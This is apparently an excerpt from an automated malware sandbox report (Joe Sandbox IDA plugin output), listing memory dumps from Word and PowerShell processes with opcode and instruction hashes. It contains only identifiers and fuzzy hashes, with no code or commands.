                                                                                                                                                                                                                                • Snapshot File: hcaresult_47_2_7ffd9a8b0000_word.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: <P_^$=P_^$P_^j$P_^p
                                                                                                                                                                                                                                • API String ID: 0-44659116
                                                                                                                                                                                                                                • Opcode ID: c2547940b3e967ae60f9395eada9943db0980e8c63c6b4055a7c22d6c5a5fac0
                                                                                                                                                                                                                                • Instruction ID: 5e1585e673de5cbd5fbc2b82699c515abac60ad61b06f3779326ccd3fc8eac5c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2547940b3e967ae60f9395eada9943db0980e8c63c6b4055a7c22d6c5a5fac0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 983134D7F4C41259E311BBE92CA26DC3794AF90378B584133C1EC8B1CBCE58744A85DA
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000033.00000002.2022245682.00007FFD9A9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A9A0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_51_2_7ffd9a9a0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: @ns
                                                                                                                                                                                                                                • API String ID: 0-2502002506
                                                                                                                                                                                                                                • Opcode ID: bc74481d40e43a57c91ed41fc5ee343c9cee032a86a635c9f160c09f69ba0ad8
                                                                                                                                                                                                                                • Instruction ID: 8dff54a9336db702bba04d3c2724da2d362683eb236ffe4fb210b7d00b87b409
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc74481d40e43a57c91ed41fc5ee343c9cee032a86a635c9f160c09f69ba0ad8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41224823B0EB895FE7AA9B7858641B47BE1EF86324B6801FBD04DC71D7E918AC45C341
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000033.00000002.2020995781.00007FFD9A8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8D0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_51_2_7ffd9a8d0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 582ec4015e148656565802fca0c20a67d83edd059695b92f10bd9d18814bcc9a
                                                                                                                                                                                                                                • Instruction ID: baab56c9e0b2abe6e54c8c6a642fb010ca9ebea6aa451493cdb1ff6bbb6cfab4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 582ec4015e148656565802fca0c20a67d83edd059695b92f10bd9d18814bcc9a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AAF10973F0E6864FEB159BAC98751E97FB0EF52320B0902FBD489C71A3DD2968068751
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000033.00000002.2020995781.00007FFD9A8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8D0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_51_2_7ffd9a8d0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a81ae072efffd8851f4367c64a5e1c68c3bc979309dc78bce1894f9073f9da94
                                                                                                                                                                                                                                • Instruction ID: 985ec36ebc384a2b3af7f24514513048d645c58b6a2003f620c5c3ba46d9311f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a81ae072efffd8851f4367c64a5e1c68c3bc979309dc78bce1894f9073f9da94
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0861F471E096498FDB58DFACD8556ECBBF1EF4A310F1442AED00DD7292CA35A842CB40
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000033.00000002.2020995781.00007FFD9A8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8D0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_51_2_7ffd9a8d0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                • Instruction ID: 0909884202c2d8c793c840d1a1558e6ff8ba582b98f23f4b5f840faf0850cf9c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C01A73120CB0C4FD748EF0CE451AA5B3E0FB85324F10066DE58AC3695D736E882CB42
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000051.00000002.2012804966.00007FFD9A8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8F0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_81_2_7ffd9a8f0000_word.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a939a16d7107cb057d8037210f216452a59d658ab99de347d4e8063055b2d05b
                                                                                                                                                                                                                                • Instruction ID: 84d316cdc90fccec2e5ce14af445c795a67ccfdaac967db052824e790b023e28
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a939a16d7107cb057d8037210f216452a59d658ab99de347d4e8063055b2d05b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32428761F28A4A4FE798EB6C8875679B7D2FF98314F54057DE04EC32DADE286C018781